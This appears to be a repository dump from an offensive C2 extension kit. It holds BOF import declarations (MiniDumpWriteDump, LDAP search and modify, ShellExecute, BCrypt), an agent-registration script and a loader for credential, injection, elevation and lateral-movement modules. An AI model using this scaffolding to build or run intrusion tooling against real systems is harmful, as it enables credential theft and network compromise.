DECLSPEC_IMPORT WINBOOL WINAPI DBGHELP$MiniDumpWriteDump(HANDLE hProcess,DWORD ProcessId,HANDLE hFile,MINIDUMP_TYPE DumpType,CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam);

//WLDAP32
WINLDAPAPI LDAP* LDAPAPI WLDAP32$ldap_init(PSTR, ULONG);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_bind_s(LDAP *ld,const PSTR  dn,const PCHAR cred,ULONG method);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_search_s(LDAP *ld,PSTR base,ULONG scope,PSTR filter,PZPSTR attrs,ULONG attrsonly,PLDAPMessage *res);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_entries(LDAP*,LDAPMessage*);
WINLDAPAPI struct berval **LDAPAPI WLDAP32$ldap_get_values_lenA (LDAP *ExternalHandle,LDAPMessage *Message,const PCHAR attr);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free_len(struct berval **vals);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_set_optionA(LDAP *ld,int option,const void *invalue);
WINLDAPAPI PLDAPSearch LDAPAPI WLDAP32$ldap_search_init_pageA(PLDAP ExternalHandle,const PCHAR DistinguishedName,ULONG ScopeOfSearch,const PCHAR SearchFilter,PCHAR AttributeList[],ULONG AttributesOnly,PLDAPControlA *ServerControls,PLDAPControlA *ClientControls,ULONG PageTimeLimit,ULONG TotalSizeLimit,PLDAPSortKeyA *SortKeys);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_paged_count(PLDAP ExternalHandle,PLDAPSearch SearchBlock,ULONG *TotalCount,PLDAPMessage Results);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_next_page_s(PLDAP ExternalHandle,PLDAPSearch SearchHandle,struct l_timeval *timeout,ULONG PageSize,ULONG *TotalCount,LDAPMessage **Results);

WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_first_entry(LDAP *ld,LDAPMessage *res);
WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_next_entry(LDAP*,LDAPMessage*);
WINLDAPAPI PCHAR  LDAPAPI WLDAP32$ldap_first_attribute(LDAP *ld,LDAPMessage *entry,BerElement **ptr);
WINLDAPAPI ULONG  LDAPAPI WLDAP32$ldap_count_values(PCHAR);
WINLDAPAPI PCHAR* LDAPAPI WLDAP32$ldap_get_values(LDAP *ld,LDAPMessage *entry,const PSTR attr);
WINLDAPAPI ULONG  LDAPAPI WLDAP32$ldap_value_free(PCHAR *);
WINLDAPAPI PCHAR  LDAPAPI WLDAP32$ldap_next_attribute(LDAP *ld,LDAPMessage *entry,BerElement *ptr);
WINLDAPAPI VOID   LDAPAPI WLDAP32$ber_free(BerElement *pBerElement,INT fbuf);
WINLDAPAPI VOID   LDAPAPI WLDAP32$ldap_memfree(PCHAR);

WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind(LDAP*);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind_s(LDAP*);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_msgfree(LDAPMessage*);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_set_option(LDAP *ld, int option, void *invalue);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_add_s(LDAP *ld, PSTR dn, LDAPModA *mods[]);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_modify_s(LDAP *ld, PSTR dn, LDAPModA *mods[]);
WINLDAPAPI PSTR  LDAPAPI WLDAP32$ldap_err2string(ULONG err);
WINBERAPI BerElement* BERAPI WLDAP32$ber_alloc_t(INT options);
WINBERAPI INT   BERAPI WLDAP32$ber_printf(BerElement *pBerElement, PSTR fmt, ...);
WINBERAPI INT   BERAPI WLDAP32$ber_flatten(BerElement *pBerElement, PBERVAL *pBerVal);
WINLDAPAPI VOID LDAPAPI WLDAP32$ber_bvfree(PBERVAL bv);

//RPCRT4
RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$UuidToStringA(UUID *Uuid,RPC_CSTR *StringUuid);
RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$RpcStringFreeA(RPC_CSTR *String);

//PSAPI
DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModulesEx(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag);
DECLSPEC_IMPORT BOOL    WINAPI PSAPI$EnumProcessModules(HANDLE HProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded);
DECLSPEC_IMPORT DWORD   WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize);

//SHELL32
WINBASEAPI LPWSTR*   WINAPI SHELL32$CommandLineToArgvW(LPCWSTR lpCMdLine, int* pNumArgs);
WINBASEAPI BOOL      WINAPI SHELL32$ShellExecuteExW(LPSHELLEXECUTEINFOW pExecInfo);
WINBASEAPI HINSTANCE WINAPI SHELL32$ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
WINBASEAPI WINBOOL   WINAPI SHELL32$ShellExecuteExA(SHELLEXECUTEINFOA *pExecInfo);

//BCRYPT
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptOpenAlgorithmProvider(BCRYPT_ALG_HANDLE *phAlgorithm, LPCWSTR pszAlgId, LPCWSTR pszImplementation, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptCloseAlgorithmProvider(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptGetProperty(BCRYPT_HANDLE hObject, LPCWSTR pszProperty, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptSetProperty(BCRYPT_HANDLE hObject, LPCWSTR pszProperty, PUCHAR pbInput, ULONG cbInput, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptGenerateSymmetricKey(BCRYPT_ALG_HANDLE hAlgorithm, BCRYPT_KEY_HANDLE *phKey, PUCHAR pbKeyObject, ULONG cbKeyObject, PUCHAR pbSecret, ULONG cbSecret, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptDestroyKey(BCRYPT_KEY_HANDLE hKey);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptDecrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptEncrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptCreateHash(BCRYPT_ALG_HANDLE hAlgorithm, BCRYPT_HASH_HANDLE *phHash, PUCHAR pbHashObject, ULONG cbHashObject, PUCHAR pbSecret, ULONG cbSecret, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptHashData(BCRYPT_HASH_HANDLE hHash, PUCHAR pbInput, ULONG cbInput, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptFinishHash(BCRYPT_HASH_HANDLE hHash, PUCHAR pbOutput, ULONG cbOutput, ULONG dwFlags);
DECLSPEC_IMPORT NTSTATUS WINAPI BCRYPT$BCryptDestroyHash(BCRYPT_HASH_HANDLE hHash);

//VERSION
DECLSPEC_IMPORT DWORD   WINAPI VERSION$GetFileVersionInfoSizeA(LPCSTR lptstrFilenamea ,LPDWORD lpdwHandle);
DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen);
DECLSPEC_IMPORT DWORD   WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilename, LPDWORD lpdwHandle);
DECLSPEC_IMPORT BOOL    WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
DECLSPEC_IMPORT BOOL    WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen);

================================================
FILE: add_agent.sh
================================================
#!/bin/bash

if [ -z "$1" ]; then
    echo "Use: $0 <agent_name>"
    echo "Example: $0 kharon"
    exit 1
fi

AGENT_NAME="$1"

find . -type f -name "*.axs" | while read -r file; do
    if grep -q 'register_commands_group' "$file" && grep -q '"beacon", "gopher"' "$file"; then
        if ! grep -q "$AGENT_NAME" "$file"; then
            echo "[+] Update file: $file"

            sed -i 's/\["beacon", "gopher"\]/["beacon", "gopher", "'"$AGENT_NAME"'"]/g' "$file"
        else
            echo "[!] Agent $AGENT_NAME already exists in $file"
        fi
    fi
done

echo "--- Complete ---"

================================================
FILE: docker-compose.yml
================================================
services:
  bof-build:
    build:
      context: .
      dockerfile: Dockerfile
    volumes:
      - .:/src
    working_dir: /src

================================================
FILE: extension-kit.axs
================================================
var metadata = {
    name: "",
    description: "",
    nosave: true
};

var path = ax.script_dir();
ax.script_load(path + "AD-BOF/ad.axs");
ax.script_load(path + "AD-BOF/ad-services.axs");
ax.script_load(path + "Creds-BOF/creds.axs");
ax.script_load(path + "Elevation-BOF/elevate.axs");
ax.script_load(path + "Execution-BOF/execution.axs");
ax.script_load(path + "Injection-BOF/inject.axs");
ax.script_load(path + "LateralMovement-BOF/lateral.axs");
ax.script_load(path + "Postex-BOF/postex.axs");
ax.script_load(path + "Process-BOF/process.axs");
ax.script_load(path + "SAL-BOF/sal.axs");
ax.script_load(path + "SAR-BOF/sar.axs");